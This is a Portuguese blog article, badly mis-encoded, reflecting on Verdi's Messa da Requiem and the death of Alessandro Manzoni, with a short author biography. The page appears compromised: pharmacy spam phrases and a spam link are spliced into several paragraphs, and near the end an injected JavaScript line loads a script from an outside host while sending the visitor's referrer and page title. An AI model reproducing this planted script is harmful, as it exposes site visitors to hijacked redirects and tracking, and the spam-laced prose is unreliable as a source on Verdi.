ArtigoLateral

A divindade na mA?sica de Verdi

 

O gA?nio da mA?sica encontrava-se diante do grande mistA�rio da vida: a morte.

 

Uma mA?sica que culmina com a maturidade do compositor: a morte de seu A�dolo Alessandro Francesco Tommaso Manzoni, escritor e poeta a quem Giuseppe Verdi tanto admirava, influenciou a obra e deixou o compositor muito abalado.

Messa da Requiem, Missa de Descanso. Verdi mais uma vez surpreende seu pA?blico com um estilo totalmente “revolucionA?rio”. A tristeza do compositor com a morte do A�dolo ganha voz na introduA�A?o sombria da orquestra. Instrumentos de corda se unem A�s vozes do coro e, juntos, formam uma grande ligaA�A?o sonora entre humano e divino. tegretol cr price Requiem aeternam online online a�� assim vamos entrando nesse mundo invisA�vel criado pela visA?o do compositor italiano.

Cheap Kyrie Eleison, Christe Eleison Pills . O caminhar de Verdi comeA�a pelas vozes solistas. O tenor dA? inA�cio a esse longo diA?logo, seguido do baixo, logo pela mezzo-soprano, juntando-se a soprano a esse clamor. PungA?ncia que ecoa nas vozes do coro, que se une em questionamento ao imponderA?vel, ao destino da humanidade. Mas tudo isso, para Verdi, A� um grande vazio, quase insuportA?vel.

Dies Irae xenical male enhancement . Os metais e a percussA?o tomam a frente, com tamanha dramaticidade dividida tambA�m pelo coro. Dia da Ira, aquele em que os sA�culos dissolver-se-A?o em cinza, David com Sibila por testemunha!

Tudo A� muito questionA?vel para o compositor pouco crA�dulo, mas, ao mesmo tempo, temente do divino. A emoA�A?o da perda do grande poeta talvez tenha trazido novo sentido para o mA?sicoA�por meio de seu imaginA?rio. SA?o contrastes da vida real, transcritos em notas que vA?o ganhando novo sentido e, ao mesmo tempo, transformando o universo particular do ouvinte espectador.

Outro momento devastador para um ser humano frA?gil como o maestro Verdi A� pensar no JuA�zo Final. E este A� anunciado pelos metais, sem economia de dramaticidade e imponA?ncia.

Se fizermos uma reflexA?o a respeito das obras escritas pelo gA?nioA�italiano, vamos perceber que a dor foi uma presenA�a constante em seus personagens: a dor pessoal que ganha dimensA?o na dor humana e universal.

Falar no http://viaddress.net/has-actonel-gone-generic.html RA�quiem de Verdi A� falar em dramaticidade vocal quase teatral. Nessa obra A� claramente notA?vel o teor invisA�vel na visA?o do compositor italiano.

Recordare Jesu Pie. Recorda piedoso Jesus que sou causa da Tua vida: nA?o me percas nesse dia. Aqui talvez se possa dizer que o compositor comeA�a a perceber sua humanidade verdadeira perante Deus. Um dueto de vozes femininas dA? a doA�ura tA?nue de um diA?logo sincero entre o divino e o humano. SerA? que temos a oportunidade que Verdi tenta evidenciar por sua mA?sica?

Verdi continua o diA?logo entre Pai e Filho. Criador e Criatura na voz do tenor solista a�� Ingemisco Pills A� quase uma sA?plica, um pedido de perdA?o. A� no colo do Pai que o Filho faz lembrar a passagem do bom, ladrA?o que Cristo perdoa ao pA� da cruz. Verdi pede tambA�m a esperanA�a. EsperanA�a que se encontra distante frente A� dor da perda de Manzoni. EsperanA�a de que, a cada dia, o ser humano necessita para continuar a caminhada.

A mA?sica do maestro Verdi ganha ainda mais forA�a e realidade. Encontramo-nos mergulhados na indiferenA�a. A inA�rcia dos tempos atuais estA? consumindo sonhos e ideias. Essa dramaticidade verdiana nos propA�e o despertar para o mundo real, que vem a ser o mundo invisA�vel.

Para finalizar, uma frase emblemA?tica de todo texto: livra-me, Senhor, da morte eterna!

Essa morte eterna nA?o serA? a morte que nA?s, seres humanos, provocamos em nA?s mesmos com nossa inA�rcia?

Livra-me, Senhor, da morte eterna…

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Wellen Barros
Wellen Barros – Cantora Lírica integrante dos corpos artísticos do Theatro Municipal do Rio de Janeiro. Concluiu Bacharelado em Música pelo Conservatório de Música de Niterói. Formada em História da Dança pela UNIDANÇA. Atua como preparadora vocal para atores na Companhia de Teatro Recontando Conto. Possui especialização em Shakespeare tendo como Mestra Bárbara Heliodora. Atualmente desenvolve pesquisa sobre Verdi e sua dramaticidade teatral. Autora da Biografia da primeira bailarina do Theatro Municipal do Rio de Janeiro – Cecília Kerche para o Figuras da Dança da São Paulo Companhia de Dança.